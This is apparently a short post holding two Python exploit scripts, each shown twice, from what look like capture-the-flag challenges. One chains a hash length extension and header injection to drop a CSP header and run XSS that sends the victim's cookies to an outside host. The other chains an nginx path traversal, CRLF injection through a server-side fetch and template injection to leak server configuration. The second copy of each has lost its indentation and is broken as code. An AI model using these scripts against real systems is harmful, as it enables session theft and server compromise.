shpik-kr · February 10, 2020 03:39
diff --git a/csp.py b/csp.py
 '''
 1. hash length extension: Make multi query.
 2. header injection: Remove CSP header, and XSS occur
 '''

 import hashpumpy
 import requests

 b64e = lambda x:x.encode('base64').replace('\n','')

 h = '9324c43e76bdfb789eebe82870f2d1a8'
 origin = 'aGVhZGVy,VmFyeQ==,Kg=='

 payload = '<script\n>location.href="//mashiro.kr?"+document.cookie;</script\n>'
 add = '|'
 add += b64e('header')+','+b64e('HTTP/1.1')+','+b64e('100 Continue')+'|'
 add += b64e('body')+','+b64e('HTTP/1.1 200 OK\r\nHost: 127.0.0.1\r\nContent-Type: text/html\r\nContent-Length: '+str(len(payload))+'\r\n\r\n'+payload+'\r\n')+','+b64e('')+'|'

 key_legnth = 12
 new_hash,msg = hashpumpy.hashpump(h, origin, add, 12)
 encoded = (msg).encode('base64').replace('\n','')

 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 host = "110.10.147.166"
 port = 80

 print 'http://%s/api.php?sig=%s&q=%s'%(host, new_hash, encoded)

 s.connect((host, port))
 data = '''GET /api.php?sig=%s&q=%s HTTP/1.1
 Host: %s
 '''%(new_hash, encoded, host)
 s.send(data)

 print `s.recv(1024)`
 print `s.recv(1024)`
 print `s.recv(1024)`
diff --git a/renderer.py b/renderer.py
 '''
 1. Nginx Misconfig: http://[domain]/static../, Leak source code.
 2. CRLF: Send header for bypassing some condition about header.
 3. SSTI: Read Log file as `render_template_string`.
 '''

 import requests

 def write_log(payload):
 	renderer = "http://110.10.147.169/renderer/"
 	adminpage = "http://127.0.0.1/renderer/admin?body="+payload+" HTTP/1.1\x0d\x0aHost: 127.0.0.2\x0d\x0aX-Forwarded-For: 127.0.0.2,{{config}}\r\nx:"

 	data = {
 		"url": adminpage
 	}

 	r = requests.post(renderer, data=data)
 	aa = r.text
 	a =  aa.split('ticket no ')[1].split('\n')[0]
 	return a

 def read_log(ticket):
 	renderer = "http://110.10.147.169/renderer/"
 	ticket_url = "http://127.0.0.1/renderer/admin/ticket?ticket="+ticket+" HTTP/1.1\x0d\x0aUser-Agent: AdminBrowser/1.337\r\nX-Forwarded-For: 127.0.0.1\r\nHost: 127.0.0.1\r\n\r\nX"

 	data = {
 		"url": ticket_url
 	}

 	r = requests.post(renderer, data=data)
 	print r.text

 def file_check(ticket):
 	print requests.get('http://110.10.147.169/static../tickets/'+ticket).text


 payload = "{{config}}"
 ticket = write_log(payload)
 print 'ticket no', ticket
 file_check(ticket)
 read_log(ticket)
	'''
	1. hash length extension: Make multi query.
	2. header injection: Remove CSP header, and XSS occur
	'''

	import hashpumpy
	import requests

	b64e = lambda x:x.encode('base64').replace('\n','')

	h = '9324c43e76bdfb789eebe82870f2d1a8'
	origin = 'aGVhZGVy,VmFyeQ==,Kg=='

	payload = '<script\n>location.href="//mashiro.kr?"+document.cookie;</script\n>'
	add = '\|'
	add += b64e('header')+','+b64e('HTTP/1.1')+','+b64e('100 Continue')+'\|'
	add += b64e('body')+','+b64e('HTTP/1.1 200 OK\r\nHost: 127.0.0.1\r\nContent-Type: text/html\r\nContent-Length: '+str(len(payload))+'\r\n\r\n'+payload+'\r\n')+','+b64e('')+'\|'

	key_legnth = 12
	new_hash,msg = hashpumpy.hashpump(h, origin, add, 12)
	encoded = (msg).encode('base64').replace('\n','')

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	host = "110.10.147.166"
	port = 80

	print 'http://%s/api.php?sig=%s&q=%s'%(host, new_hash, encoded)

	s.connect((host, port))
	data = '''GET /api.php?sig=%s&q=%s HTTP/1.1
	Host: %s
	'''%(new_hash, encoded, host)
	s.send(data)

	print `s.recv(1024)`
	print `s.recv(1024)`
	print `s.recv(1024)`
	'''
	1. Nginx Misconfig: http://[domain]/static../, Leak source code.
	2. CRLF: Send header for bypassing some condition about header.
	3. SSTI: Read Log file as `render_template_string`.
	'''

	import requests

	def write_log(payload):
	renderer = "http://110.10.147.169/renderer/"
	adminpage = "http://127.0.0.1/renderer/admin?body="+payload+" HTTP/1.1\x0d\x0aHost: 127.0.0.2\x0d\x0aX-Forwarded-For: 127.0.0.2,{{config}}\r\nx:"

	data = {
	"url": adminpage
	}

	r = requests.post(renderer, data=data)
	aa = r.text
	a = aa.split('ticket no ')[1].split('\n')[0]
	return a

	def read_log(ticket):
	renderer = "http://110.10.147.169/renderer/"
	ticket_url = "http://127.0.0.1/renderer/admin/ticket?ticket="+ticket+" HTTP/1.1\x0d\x0aUser-Agent: AdminBrowser/1.337\r\nX-Forwarded-For: 127.0.0.1\r\nHost: 127.0.0.1\r\n\r\nX"

	data = {
	"url": ticket_url
	}

	r = requests.post(renderer, data=data)
	print r.text

	def file_check(ticket):
	print requests.get('http://110.10.147.169/static../tickets/'+ticket).text


	payload = "{{config}}"
	ticket = write_log(payload)
	print 'ticket no', ticket
	file_check(ticket)
	read_log(ticket)